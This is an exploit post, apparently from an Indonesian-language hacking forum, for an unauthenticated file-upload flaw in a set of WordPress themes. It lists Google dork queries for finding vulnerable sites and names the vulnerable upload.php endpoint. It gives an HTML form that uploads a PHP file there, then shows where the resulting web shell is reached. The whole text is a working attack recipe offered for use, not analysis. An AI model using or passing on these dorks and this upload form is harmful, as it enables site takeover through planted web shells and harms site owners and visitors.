Exploit Theme Wordpress File Upload Vulnerability

Exploit Theme Wordpress File Upload Vulnerability

Mr.X98

Dork :

inurl:"/wp-content/themes/kindness/"

inurl:"/wp-content/themes/oakland/"

inurl:"/wp-content/themes/brilliant/"

inurl:"/wp-content/themes/echolake/"

inurl:"/wp-content/themes/emcwil/"

inurl:"/wp-content/themes/trymee/"

inurl:"/wp-content/themes/shepard/"

inurl:"/wp-content/themes/pacifico/"

inurl:"/wp-content/themes/willbridge/"

inurl:"/wp-content/themes/qreator/"

inurl:"/wp-content/themes/Clockstone/"

inurl:"/wp-content/themes/expresso/"

inurl:"/wp-content/themes/cleanple/"

inurl:"//wp-content/themes/eac/"

Exploit : localhost/[path]/wp-content/themes/kindness/theme/functions/upload.php

 

Proof Of Concept

1. Dorking google cari target

2. Eksploitasi

Ciri-ciri vuln muncul error kek gambar dibawah

3. CSRF

<form enctype="multipart/form-data"
action="localhost/wp-content/themes/kindness/theme/functions/upload.php"
method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

Upload file .php

4. Kalo sukses muncul ID nya

Shell akses : localhost/wp-content/themes/kindness/theme/functions/id_shell.php